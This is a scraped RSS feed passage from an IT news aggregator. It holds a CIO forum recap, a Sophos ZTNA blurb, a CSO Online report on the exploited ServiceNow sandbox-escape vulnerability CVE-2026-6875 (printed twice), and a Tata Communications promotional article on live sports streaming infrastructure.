<p class="wp-block-paragraph">The “Think Like a VC, Investment Shifts Towards Focused AI Applications” session featured three venture investors, Aaron Darr, partner at Lead Edge; Isabelle Phelps, partner at Lerer Hippeau; and Marshall Porter, general partner at AlleyCorp. The panel explored how investors evaluate risk and talent in a market where products and competitive positions can shift within months, and what separates a focused AI application with durable enterprise value from an AI wrapper built to chase a trend.</p>



<p class="wp-block-paragraph">The panel challenged the enterprise instinct to seek certainty in a market moving this fast, questioning whether CIOs should stop looking for technologies that will future-proof the enterprise and instead grow more comfortable continuously reassessing their bets. Investors framed this as a deliberate departure from the traditional low-tolerance-for-failure posture that has long governed enterprise technology purchasing, arguing that the search for certainty has itself become a risk in a market where products and business models can shift within months. The discussion pressed CIOs to weigh how they can adopt a more dynamic investment mindset without compromising the enterprise security, governance and accountability their organizations still depend on.</p>



<p class="wp-block-paragraph">A Lightning Insights followed, featuring five-minute briefings from Insight, Platform9 and Console, followed by Keystone Senior Principal Ellora Sarkar’s talk on why most enterprise AI investment fails to produce measurable value and what separates the small share of firms capturing real return on investment from the majority still stuck in pilots.</p>



<h2 class="wp-block-heading">Closing the day</h2>



<p class="wp-block-paragraph">The forum closed with “What’s Next for the CIO, Preparing for the Next 12 to 24 Months,” a fireside conversation with Leif Maiorini, CIO for corporate services at Omnicom. Maiorini discussed why business processes need to be redesigned for agentic speed rather than automated around existing human workflows, how organizational structures may shift as autonomous agents reshape visibility and decision support, and where sustainable differentiation will come from once AI capability itself becomes widely accessible.</p>



<p class="wp-block-paragraph">Maiorini encouraged the industry to clearly distinguish between nondifferentiated services that should be made as efficient as possible and the differentiated capabilities that actually influence why customers choose to do business with an organization, once the major efficiency gains from optimization and AI have been captured.</p>



<p class="wp-block-paragraph">He was candid about the governance gap agentic systems open up, noting that agents lack the professional reputation, personal accountability and inherent constraints that shape human behavior, which creates new risk when autonomous decisions occur at machine speed. That combination, reinvesting efficiency gains into genuine differentiation while building governance models suited to non-human decision-makers, framed his closing case for why human creativity and judgment remain the enterprise’s most durable asset even as the underlying technology becomes commoditized.</p>



<p class="wp-block-paragraph"><strong><em>Join the CIO 100 Awards &amp; Conference Aug 17–19, 2026 at Omni PGA Frisco Resort &amp; Spa, Frisco, TX — where top IT leaders celebrate innovation and connect.  <a href="https://event.foundryco.com/cio100-symposium-and-awards/?utm_medium=editorial&amp;utm_source=cio100_foundry_research&amp;utm_campaign=cio_100_research_foundry&amp;utm_term=4/8/2026-8/19//2026&amp;utm_content=editorial">Learn more to attend or partner</a>.</em></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sophos ZTNA unlocks SaaS app control and so much more]]></title>
<description><![CDATA[Sophos ZTNA customers now get Sophos Protected Browser as part of Sophos Workspace Protection, extending Zero Trust controls to SaaS and web apps while improving secure RDP and SSH access.]]></description>
<link>https://tsecurity.de/de/3682158/it-security-nachrichten/sophos-ztna-unlocks-saas-app-control-and-so-much-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682158/it-security-nachrichten/sophos-ztna-unlocks-saas-app-control-and-so-much-more/</guid>
<pubDate>Mon, 20 Jul 2026 22:53:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Sophos ZTNA customers now get Sophos Protected Browser as part of Sophos Workspace Protection, extending Zero Trust controls to SaaS and web apps while improving secure RDP and SSH access.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow’s sandbox escape RCE hole now exploited in the wild]]></title>
<description><![CDATA[A sandbox security hole that could lead to remote code execution (RCE), patched last week by ServiceNow, is being actively exploited in the wild, according to a report from threat intel firm Defused. 



The report, posted on X, said the firm is “observing in-the-wild exploitation of the ServiceN...]]></description>
<link>https://tsecurity.de/de/3682156/it-security-nachrichten/servicenows-sandbox-escape-rce-hole-now-exploited-in-the-wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682156/it-security-nachrichten/servicenows-sandbox-escape-rce-hole-now-exploited-in-the-wild/</guid>
<pubDate>Mon, 20 Jul 2026 22:53:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A sandbox security hole that could lead to remote code execution (RCE), patched last week by ServiceNow, is being actively exploited in the wild, according to <a href="https://x.com/defusedcyber/status/2078418391321219448" target="_blank" rel="noreferrer noopener">a report from threat intel firm Defused</a>. </p>



<p class="wp-block-paragraph">The report, posted on X, said the firm is “observing in-the-wild exploitation of the ServiceNow pre-auth sandbox-escape RCE (CVE-2026-6875).”</p>



<p class="wp-block-paragraph">Defused CEO <a href="https://www.linkedin.com/in/simokohonen" target="_blank" rel="noreferrer noopener">Simo Kohonen</a>, in an interview with CSO Online, noted that it appeared that the attacker has changed its tactics from those documented in an earlier proof of concept (PoC) from researchers at Searchlight Cyber, in response to ServiceNow patches and defenses. The company had implemented five different mitigations in its code base, which “neutered” the initial attack methodology, he said, adding that, overall, his team is seeing more attack method tweaks than it used to see. </p>



<p class="wp-block-paragraph">“We are seeing a lot of [attack] variations, much more so than a year ago, for the same vulnerability,” Kohonen said. Attackers “now have more tools to build their own stuff.”</p>



<p class="wp-block-paragraph">However, he admitted that his team has thus far only observed this exploit an in the wild exploitation “once, by one actor.” </p>



<p class="wp-block-paragraph">In response to the report, ServiceNow issued a statement saying that it has not yet directly seen any such exploitations. </p>



<p class="wp-block-paragraph">“ServiceNow is aware of a cybersecurity company’s recent publication regarding exploitation activity associated with a previously disclosed security vulnerability, identified as <a href="https://support.servicenow.com/kb/kb/kb/kb?id=kb_article_view&amp;sysparm_article=KB3137947" target="_blank" rel="noreferrer noopener">CVE-2026-6875</a>. Based on our investigation to date, we have not observed evidence that this activity is related to instances that ServiceNow hosts,” the emailed statement said. “We have provided updates and patches designed to address this issue, and we encourage our self-hosted and ServiceNow-hosted customers to apply the relevant patches if they have not already done so.”</p>



<h2 class="wp-block-heading">A ‘repeatable failure point’</h2>



<p class="wp-block-paragraph">Analysts and consultants said the bigger concern with this hole is that it focuses on the lack of protections in the sandbox, which many security and IT teams have relied on for years. </p>



<p class="wp-block-paragraph">“The vulnerability lets an attacker bypass ServiceNow’s scripting sandbox entirely, and researchers are now seeing exploitation using a different technique than the one originally published, which means signature-based defenses built on the first proof of concept are unlikely to catch every variant,” said <a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC. </p>



<p class="wp-block-paragraph">“A compromise that starts in the cloud tenant can end up inside the corporate network, turning a SaaS incident into an on-premises one,” he pointed out. “And because ServiceNow frequently houses HR records, CMDB asset data, and the ticketing system itself, an attacker sitting inside it may have visibility into how the incident response team is tracking the incident.”</p>



<p class="wp-block-paragraph">Dickson added that this incident is further proof that both IT and security teams need to reevaluate their patching methodologies. </p>



<p class="wp-block-paragraph">“Enterprises outsource patching for platforms like ServiceNow to the vendor, but keep the risk that comes from what those platforms touch: HR records, CMDB inventories, and now on-premises systems through MID Server integration. Control sits with the vendor, liability sits with the enterprise, and that mismatch argues for treating core SaaS platforms as part of the internal attack surface, not externalized vendor risk,” he said, noting that as vendors embed more AI-driven scripting into their platforms, the sandbox boundary becomes “a repeatable failure point.” </p>



<p class="wp-block-paragraph">Because of this, he advised, “CISOs should start asking every AI-enabled SaaS vendor how that boundary is architected and tested, before the next version of this story breaks elsewhere.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520, said the sandbox escape is the more disturbing element of the issue. </p>



<p class="wp-block-paragraph">“The significance is not that ServiceNow had a critical bug, so much as the fact that the bug is a sandbox escape in the AI Platform, which means the containment layer specifically built to run untrusted AI-driven code safely is the thing that failed,” he said. “CISOs have been told repeatedly that the sandbox is what makes enterprise AI safe to deploy, but we’re now seeing the sandbox breaking and that should reframe how CISOs think about every feature sitting behind a similar wall.”</p>



<h2 class="wp-block-heading">Addition of AI increases blast radius</h2>



<p class="wp-block-paragraph">This is yet another example where AI is fundamentally changing just about every IT and security rule, he pointed out.</p>



<p class="wp-block-paragraph">“Enterprises are bolting AI onto their most privileged systems of record faster than anyone is updating the threat models for those systems, and the AI layer is becoming the softest part of the hardest targets,” Kenney said. “The real question for a CISO is how many of your critical platforms shipped an AI feature in the past year, and whether a single person in your organization can tell you what that did to the pre-auth attack surface. Most cannot, and that is the actual exposure.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, agreed.</p>



<p class="wp-block-paragraph">“A vulnerability that gives an attacker a foothold in the ServiceNow instance is now also a vulnerability that gives them access to whatever AI agents are running inside that instance, along with any capability tokens, service accounts, or delegated permissions those agents hold,” Mahapatra said. “The blast radius of a ServiceNow compromise in 2026 is meaningfully larger than the same compromise would have been in 2023, and most enterprise security programs have not caught up to that shift.”</p>



<p class="wp-block-paragraph">Defused’s Kohonen said that he did not disagree with the sandbox concerns, but he stressed that enterprise CISOs have long ago abandoned the belief that sandboxes are secure. </p>



<p class="wp-block-paragraph">“Nothing is foolproof, and having a sandbox is better than not having one,” he said. “But the belief that a sandbox removes all of the risk is incredibly dumb,” especially in the reality of today’s threat landscape, which contains “an endless conveyor belt of exploits.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow’s sandbox escape RCE hole now exploited in the wild]]></title>
<description><![CDATA[A sandbox security hole that could lead to remote code execution (RCE), patched last week by ServiceNow, is being actively exploited in the wild, according to a report from threat intel firm Defused. 



The report, posted on X, said the firm is “observing in-the-wild exploitation of the ServiceN...]]></description>
<link>https://tsecurity.de/de/3682130/it-nachrichten/servicenows-sandbox-escape-rce-hole-now-exploited-in-the-wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682130/it-nachrichten/servicenows-sandbox-escape-rce-hole-now-exploited-in-the-wild/</guid>
<pubDate>Mon, 20 Jul 2026 22:47:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A sandbox security hole that could lead to remote code execution (RCE), patched last week by ServiceNow, is being actively exploited in the wild, according to <a href="https://x.com/defusedcyber/status/2078418391321219448" target="_blank" rel="noreferrer noopener">a report from threat intel firm Defused</a>. </p>



<p class="wp-block-paragraph">The report, posted on X, said the firm is “observing in-the-wild exploitation of the ServiceNow pre-auth sandbox-escape RCE (CVE-2026-6875).”</p>



<p class="wp-block-paragraph">Defused CEO <a href="https://www.linkedin.com/in/simokohonen" target="_blank" rel="noreferrer noopener">Simo Kohonen</a> noted in an interview that it appeared that the attacker has changed its tactics from those documented in an earlier proof of concept (PoC) from researchers at Searchlight Cyber, in response to ServiceNow patches and defenses. The company had implemented five different mitigations in its code base, which “neutered” the initial attack methodology, he said, adding that, overall, his team is seeing more attack method tweaks than it used to see. </p>



<p class="wp-block-paragraph">“We are seeing a lot of [attack] variations, much more so than a year ago, for the same vulnerability,” Kohonen said. Attackers “now have more tools to build their own stuff.”</p>



<p class="wp-block-paragraph">However, he admitted that his team has thus far only observed this exploit an in the wild exploitation “once, by one actor.” </p>



<p class="wp-block-paragraph">In response to the report, ServiceNow issued a statement saying that it has not yet directly seen any such exploitations. </p>



<p class="wp-block-paragraph">“ServiceNow is aware of a cybersecurity company’s recent publication regarding exploitation activity associated with a previously disclosed security vulnerability, identified as <a href="https://support.servicenow.com/kb/kb/kb/kb?id=kb_article_view&amp;sysparm_article=KB3137947" target="_blank" rel="noreferrer noopener">CVE-2026-6875</a>. Based on our investigation to date, we have not observed evidence that this activity is related to instances that ServiceNow hosts,” the emailed statement said. “We have provided updates and patches designed to address this issue, and we encourage our self-hosted and ServiceNow-hosted customers to apply the relevant patches if they have not already done so.”</p>



<h2 class="wp-block-heading">A ‘repeatable failure point’</h2>



<p class="wp-block-paragraph">Analysts and consultants said the bigger concern with this hole is that it focuses on the lack of protections in the sandbox, which many security and IT teams have relied on for years. </p>



<p class="wp-block-paragraph">“The vulnerability lets an attacker bypass ServiceNow’s scripting sandbox entirely, and researchers are now seeing exploitation using a different technique than the one originally published, which means signature-based defenses built on the first proof of concept are unlikely to catch every variant,” said <a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC. </p>



<p class="wp-block-paragraph">“A compromise that starts in the cloud tenant can end up inside the corporate network, turning a SaaS incident into an on-premises one,” he pointed out. “And because ServiceNow frequently houses HR records, CMDB asset data, and the ticketing system itself, an attacker sitting inside it may have visibility into how the incident response team is tracking the incident.”</p>



<p class="wp-block-paragraph">Dickson added that this incident is further proof that both IT and security teams need to reevaluate their patching methodologies. </p>



<p class="wp-block-paragraph">“Enterprises outsource patching for platforms like ServiceNow to the vendor, but keep the risk that comes from what those platforms touch: HR records, CMDB inventories, and now on-premises systems through MID Server integration. Control sits with the vendor, liability sits with the enterprise, and that mismatch argues for treating core SaaS platforms as part of the internal attack surface, not externalized vendor risk,” he said, noting that as vendors embed more AI-driven scripting into their platforms, the sandbox boundary becomes “a repeatable failure point.” </p>



<p class="wp-block-paragraph">Because of this, he advised, “CISOs should start asking every AI-enabled SaaS vendor how that boundary is architected and tested, before the next version of this story breaks elsewhere.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520, said the sandbox escape is the more disturbing element of the issue. </p>



<p class="wp-block-paragraph">“The significance is not that ServiceNow had a critical bug, so much as the fact that the bug is a sandbox escape in the AI Platform, which means the containment layer specifically built to run untrusted AI-driven code safely is the thing that failed,” he said. “CISOs have been told repeatedly that the sandbox is what makes enterprise AI safe to deploy, but we’re now seeing the sandbox breaking and that should reframe how CISOs think about every feature sitting behind a similar wall.”</p>



<h2 class="wp-block-heading">Addition of AI increases blast radius</h2>



<p class="wp-block-paragraph">This is yet another example where AI is fundamentally changing just about every IT and security rule, he pointed out.</p>



<p class="wp-block-paragraph">“Enterprises are bolting AI onto their most privileged systems of record faster than anyone is updating the threat models for those systems, and the AI layer is becoming the softest part of the hardest targets,” Kenney said. “The real question for a CISO is how many of your critical platforms shipped an AI feature in the past year, and whether a single person in your organization can tell you what that did to the pre-auth attack surface. Most cannot, and that is the actual exposure.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/akm76/" target="_blank" rel="noreferrer noopener">Aman Mahapatra</a>, chief strategy officer for Tribeca Softtech, a New York City-based technology consulting firm, agreed.</p>



<p class="wp-block-paragraph">“A vulnerability that gives an attacker a foothold in the ServiceNow instance is now also a vulnerability that gives them access to whatever AI agents are running inside that instance, along with any capability tokens, service accounts, or delegated permissions those agents hold,” Mahapatra said. “The blast radius of a ServiceNow compromise in 2026 is meaningfully larger than the same compromise would have been in 2023, and most enterprise security programs have not caught up to that shift.”</p>



<p class="wp-block-paragraph">Defused’s Kohonen said that he did not disagree with the sandbox concerns, but he stressed that enterprise CISOs have long ago abandoned the belief that sandboxes are secure. </p>



<p class="wp-block-paragraph">“Nothing is foolproof, and having a sandbox is better than not having one,” he said. “But the belief that a sandbox removes all of the risk is incredibly dumb,” especially in the reality of today’s threat landscape, which contains “an endless conveyor belt of exploits.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.csoonline.com/article/4198993/servicenows-sandbox-escape-rce-hole-now-exploited-in-the-wild.html" target="_blank">CSOonline</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The technology behind every live sports moment]]></title>
<description><![CDATA[When a goal goes in during a tournament quarter-final and a hundred million people watch it at the same time, what they feel is the goal. The roar, the replay, the disbelief.



They do not feel the contribution feeds traversing private media networks across continents, or the edge nodes absorbin...]]></description>
<link>https://tsecurity.de/de/3681409/it-nachrichten/the-technology-behind-every-live-sports-moment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681409/it-nachrichten/the-technology-behind-every-live-sports-moment/</guid>
<pubDate>Mon, 20 Jul 2026 16:48:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When a goal goes in during a tournament quarter-final and a hundred million people watch it at the same time, what they feel is the goal. The roar, the replay, the disbelief.</p>



<p class="wp-block-paragraph">They do not feel the contribution feeds traversing private media networks across continents, or the edge nodes absorbing a traffic spike that appeared without warning.</p>



<p class="wp-block-paragraph">They just feel the moment.</p>



<p class="wp-block-paragraph">And that’s exactly how it’s supposed to work.</p>



<p class="wp-block-paragraph">And as live sports viewership pushes into territory that makes previous records look modest (driven by a generation that expects to watch anything, on any device, anywhere, without waiting), the gap between getting that delivery right and getting it wrong has never been more consequential, or more public.</p>



<p class="wp-block-paragraph"><strong>As audiences moved to digital platforms, the margin for error disappeared.</strong><strong></strong></p>



<p class="wp-block-paragraph">There is a version of this conversation that is easy to have: audiences expect more, technology has to keep up. True, but incomplete.</p>



<p class="wp-block-paragraph">Audiences have always expected live sport to work. What changed is what “working” means, and how quickly they find out when it doesn’t.</p>



<p class="wp-block-paragraph">Viewers no longer sit in front of a single screen. During a FIFA World Cup match, a household might have the main feed on the living room television, while someone else streams the highlights on a second TV in the bedroom, all while phones flash with live stats and tablets run separate commentary. From the infrastructure’s perspective, that isn’t just one household watching a game; it’s a chaotic web of concurrent demands triggered by the exact same split-second on the pitch.</p>



<p class="wp-block-paragraph">Multiply that across tens of millions of viewers, and the scale of the challenge becomes clear. Social media raises the stakes further. When a platform fails during a World Cup knockout match, audiences report it in real-time on the same platforms they use to discuss the game. The complaint travels faster than the fix.</p>



<p class="wp-block-paragraph">Broadcasters no longer have the luxury of resolving an incident before people notice. The incident becomes the story, and in many cases, travels further than the match itself.</p>



<h3 class="wp-block-heading"><strong>What these viewership numbers actually mean for infrastructure</strong></h3>



<p class="wp-block-paragraph">The shift in how people watch live sport has moved well beyond trend territory.</p>



<p class="wp-block-paragraph">EMARKETER forecasts that digital live sports audiences in the US will grow to <a href="https://www.emarketer.com/content/100-million-watch-live-sports-digital">114.1 million viewers</a>, while traditional pay TV audiences decline to 82.0 million, highlighting the continued shift toward streaming.</p>



<p class="wp-block-paragraph">The concurrency numbers generated by major sporting events now sit in a territory that would have seemed implausible a decade ago.</p>



<p class="wp-block-paragraph">During the 2026 FIFA World Cup, for instance, streaming platforms shattered every historical ceiling, highlighted by Brazil’s <a href="https://streamscharts.com/news/fifa-world-cup-2026-group-stage-livestreaming">CazéTV</a> repeatedly breaking global YouTube records for concurrent viewership during the group stage. Meanwhile, in the United States, Peacock and <a href="https://www.nbcuniversal.com/article/fifa-world-cup-2026-propels-telemundo-and-peacock-record-viewership">Telemundo’s</a> digital platforms logged an unprecedented 13 million concurrent viewers for a single knockout window. </p>



<p class="wp-block-paragraph">When tens of millions of people tune into the same live stream at the same moment, it’s a challenge unlike regular web traffic.</p>



<p class="wp-block-paragraph">Historically, massive global audiences were insulated by geography. The load was spread across distinct regional networks: antenna signals, satellite downlinks, and physical cable architectures. The physical infrastructure of traditional television inherently absorbed the impact. </p>



<p class="wp-block-paragraph">Digital streaming removes that buffer. Traffic spikes all at once, often at the most critical moment. The tighter the match, the deeper the stoppage time, the sharper the spike. Network infrastructure is forced to handle its heaviest, most volatile traffic exactly when it has zero margin for error.</p>



<p class="wp-block-paragraph">Social media compounds the pressure operationally. The second a crucial goal is scored, a wave of real-time reactions floods the internet, instantly dragging a secondary “curiosity audience” into the app. These are people who weren’t even watching the match, but saw the hype and decided to tune in, meaning the network has to absorb a massive new rush of users precisely while the primary stream is already maxing out its capacity.</p>



<p class="wp-block-paragraph">To survive these surges while satisfying a modern audience, the underlying broadcast playbook has undergone a massive structural shift. It’s no longer just about handling traffic; it’s also about using modern technology like AI to manage it intelligently.</p>



<p class="wp-block-paragraph">According to an <a href="https://www.haivision.com/blog/all/2025-broadcast-transformation-report-key-takeaways/">industry survey</a>, 25% of broadcasters integrated AI into live production workflows in 2025, a massive leap from just 9% the previous year, with 64% identifying AI as the single largest impact driver over the next five years. </p>



<p class="wp-block-paragraph">The network is no longer just delivering content. AI is now generating highlights and short clips in real time, producing millions of videos that keep fans engaged long after the live moment has passed.</p>



<p class="wp-block-paragraph">Ultimately, the technical demand is driven by a shift in what viewers expect. An <a href="https://newsroom.ibm.com/2025-08-18-ibm-study-sports-fans-demand-more-dynamic-digital-content,-powered-by-ai">IBM sports study</a> revealed that 56% of fans now want AI-driven insights layered directly onto their content, while 33% point to real-time, automated translation as the feature that most impacts their experience.</p>



<p class="wp-block-paragraph">Whether it’s one screen or several, viewers don’t notice the edge infrastructure or AI powering the experience. They just expect the game to play without interruption.</p>



<h3 class="wp-block-heading"><strong>The planning mistake most organisations make</strong></h3>



<p class="wp-block-paragraph">Capacity planning is where most organisations spend their time when preparing to stream a major event. Can the system handle a million concurrent streams? Can it scale on demand if the numbers exceed projections? These are real questions. </p>



<p class="wp-block-paragraph">The lesson is not unique to sports streaming. Every digital business now experiences moments where demand, visibility, and customer expectations collide. Peak traffic events such as flash sales, ticket releases, and viral campaigns can drive website traffic <a href="https://aws.amazon.com/blogs/apn/how-to-manage-peak-traffic-on-aws-using-queue-its-virtual-waiting-room/">2 to 25 times above normal levels within seconds</a>. The infrastructure may be different, but the pressure is remarkably similar.<br></p>



<p class="wp-block-paragraph">Large-scale system failures occur when multiple components, each functioning as expected on its own, are overwhelmed by a surge in demand, rising latency, or regional blind spots at the same time.</p>



<p class="wp-block-paragraph">The problem isn’t the individual systems. It’s how they work together.</p>



<p class="wp-block-paragraph">Latency is the factor most consistently underestimated. A few seconds of delay is not a minor inconvenience in live sport. It is a fundamentally broken experience. </p>



<p class="wp-block-paragraph">A viewer whose stream is running four seconds behind will see a notification before the decisive moment appears on screen. Someone watching a service from the privacy of their room may hear a celebration from another room before seeing it on their screen.</p>



<p class="wp-block-paragraph">Geography is another planning gap. Streaming growth is increasingly being driven by emerging markets. In Southeast Asia alone, premium video streaming subscriptions grew <a href="https://avia.org/southeast-asia-premium-vod-accelerates-in-2025-as-subscriber-growth-rebounds-ctv-scales-and-local-content-breaks-through/?utm_source=chatgpt.com">19%</a> in 2025, led by Indonesia, while viewing hours continued to climb across the region. Yet much of the world’s media infrastructure was originally designed around North American and Western European demand. An architecture that looks robust on paper can deliver very different experiences depending on where the viewer is.</p>



<p class="wp-block-paragraph">The reason is simple: physical distance still matters. Every extra hop between the viewer and the content adds latency, making it harder to deliver a consistent experience at global scale.</p>



<p class="wp-block-paragraph">Then there is the timing question. The decisions that determine whether a platform holds during the most-watched minutes of the year are not made on event day. They are made months earlier through choices around architecture, redundancy, testing, and operational readiness.</p>



<p class="wp-block-paragraph">Once an event is underway, it’s too late to redesign the architecture behind it. If your system isn’t designed to handle the pressure before the crowd arrives, it’s already too late.</p>



<h3 class="wp-block-heading"><strong>The hidden chain behind every live event</strong></h3>



<p class="wp-block-paragraph">When a streaming disruption becomes public, people naturally look for a single point of failure: the app, the platform, or the provider.</p>



<p class="wp-block-paragraph">A live event depends on dozens of systems working together, and any one of them can become a problem.</p>



<p class="wp-block-paragraph">And the experience is only as good as the weakest handoff between them.</p>



<p class="wp-block-paragraph">It all starts with the live camera feed moving from the venue to the production studio. This is a real-time stream, not a file download. If you drop even a single packet at the wrong moment, everything down the line breaks, no matter how perfect the rest of your setup is.</p>



<p class="wp-block-paragraph">Remote and cloud-based production workflows have redefined how live sports are produced, enabling broadcasters to operate with greater agility and scale. As production becomes more distributed, success increasingly depends on ensuring every stage of the delivery chain works together seamlessly.</p>



<p class="wp-block-paragraph">Each transition is a potential failure point. Managing them requires visibility that extends across providers, platforms, and networks simultaneously.</p>



<p class="wp-block-paragraph">Behind every live stream, technologies like encoding, transcoding, packaging, rights management, and ad insertion are constantly at work. If any one of them fails, the stream can go down altogether.</p>



<p class="wp-block-paragraph">Global distribution introduces another layer of complexity. Viewers in Asia, Africa, and South America may all be watching the same match, but each stream travels across different networks and infrastructure. That means performance can vary by region, and issues may affect one audience without impacting another. </p>



<p class="wp-block-paragraph">AI is increasingly helping operators detect anomalies in real time, pinpoint affected regions and trigger corrective actions before disruptions become widespread. Combined with point-to-point monitoring, it provides the visibility needed to keep live events running smoothly at global scale.</p>



<p class="wp-block-paragraph">Edge delivery is where the difference between preparation and improvisation becomes most apparent. Bringing content closer to users reduces latency, absorbs local traffic surges, and improves performance in markets with variable connectivity. </p>



<p class="wp-block-paragraph">The value of technology investments such as AI and Edge becomes clearest during the moments when demand is highest.</p>



<p class="wp-block-paragraph">Monitoring is what turns visibility into action. With AI helping analyze telemetry and detect anomalies in real time, operations teams can identify issues sooner and respond before they affect viewers. By the time customers start reporting a problem, the opportunity to prevent it has already passed.</p>



<h3 class="wp-block-heading"><strong>What reliability is actually worth</strong></h3>



<p class="wp-block-paragraph">For most of early broadcast history, audience tolerance provided some buffer. Disruptions happened. People accepted them. There was nowhere else to go, and the story rarely escaped the room.</p>



<p class="wp-block-paragraph">Neither of those things is true now.</p>



<p class="wp-block-paragraph">A streaming failure during a major match becomes public within seconds. Viewers don’t distinguish between a network issue, a processing failure, or a distribution problem; they simply see a service that failed. That single experience can shape the broadcaster’s reputation, credibility and customer loyalty, influencing whether viewers come back for the next event or recommend the service to others.</p>



<p class="wp-block-paragraph">The commercial implications are significant. Global tournaments such as the FIFA World Cup illustrate just how valuable live sports rights have become. Their return depends on reliably reaching the audience that was promised.</p>



<p class="wp-block-paragraph">Advertisers invest in live sport for one reason: to reach a large, engaged audience at the exact moment it matters most. If the stream fails during that window, the opportunity is lost. Those viewers, impressions, and advertising value cannot be recovered once the moment has passed.</p>



<p class="wp-block-paragraph">The same principle increasingly applies outside media. Customers rarely know nor care whether an outage originated in the application, the cloud environment, the network or a third-party dependency. They experience a failure of the brand. In a digital-first economy, reliability has become part of the customer experience itself.</p>



<p class="wp-block-paragraph">For broadcasters and streamers, reliability is no longer just an operational KPI. It directly influences audience trust, advertising revenue, and the long-term value of premium sports rights.</p>



<h3 class="wp-block-heading"><strong>The demands ahead are bigger</strong></h3>



<p class="wp-block-paragraph">AI-assisted production is already changing how live events are created. Broadcasters are using AI to automate highlight generation, camera selection and real-time clip packaging for social media, with new AI-assisted workflows producing sports highlights up to <a href="https://www.statsperform.com/insights/opta-pulse-launch/">80% faster</a> than traditional methods. </p>



<p class="wp-block-paragraph">All of this processing happens within the live delivery chain, where every additional task must be completed without adding latency or compromising the viewing experience.</p>



<p class="wp-block-paragraph">Personalisation at scale is the next significant challenge. Not personalisation in a vague sense, but the specific technical reality of delivering multi-language commentary tracks, different languages, different statistical overlays, and different camera angles to different viewers watching the same event simultaneously. </p>



<p class="wp-block-paragraph">Instead of one stream per event, the infrastructure has to manage a matrix of concurrent variants, each with its own encoding, storage, and delivery requirements. </p>



<p class="wp-block-paragraph">Interactive experiences add bidirectional data flows: real-time polls, integrated second-screen data, live wagering. These move data from the viewer back through infrastructure that was primarily built to push content outward. Managing that at scale is a different engineering problem from managing delivery.</p>



<p class="wp-block-paragraph">Higher-resolution formats (4K now becoming a standard expectation in premium markets, 8K moving into early deployment) are bandwidth-intensive at exactly the scale where bandwidth is already under pressure. Consumer devices are ready. Infrastructure in many high-growth markets is not uniformly there yet.</p>



<p class="wp-block-paragraph">Many of these capabilities are already being deployed for major global sporting events. The organisations investing seriously in technology, innovation, and infrastructure now are building toward a standard that will be the baseline requirement within a few years. Those that are not will be closing the gap under the worst possible conditions.</p>



<h3 class="wp-block-heading"><strong>The technology you never think about</strong></h3>



<p class="wp-block-paragraph">The broadcasters that succeed don’t leave reliability to chance. They plan for it from the outset, designing their infrastructure to handle peak demand long before the audience arrives.</p>



<p class="wp-block-paragraph">This reality hits hardest during massive global events. When a stream glitches, millions of people feel it simultaneously in a matter of seconds. Keeping those streams alive doesn’t happen by accident; it takes massive scale, intense discipline, and deep experience controlling everything from the stadium camera to the viewer’s screen.</p>



<p class="wp-block-paragraph">The lesson extends well beyond live sports. Every enterprise is becoming a real-time digital business, whether it’s delivering AI-powered applications, launching digital products, processing financial transactions, or handling a sudden surge in customer demand. Different industries may face different triggers, but the expectation is the same: the experience has to work, even when demand is at its highest.</p>



<p class="wp-block-paragraph">Delivering that level of reliability is why many of the world’s largest sports brands rely on <a href="https://www.tatacommunications.com/media-entertainment">Tata Communications</a>. Supporting the broadcast, production, and management of 80% of the world’s sporting events, and reaching more than two billion viewers across 190+ countries, Tata Communications operates in the invisible layers that make every live moment possible. We call this the “Virtual Stadium of the World”, the technology and infrastructure that connects fans, broadcasters, rights-holders, and sporting moments at a truly global scale.</p>



<p class="wp-block-paragraph">By managing the critical handoffs across contribution networks, edge processing, and global media infrastructure, we engineer the resilience required to keep 120,000 live events running flawlessly every year.</p>



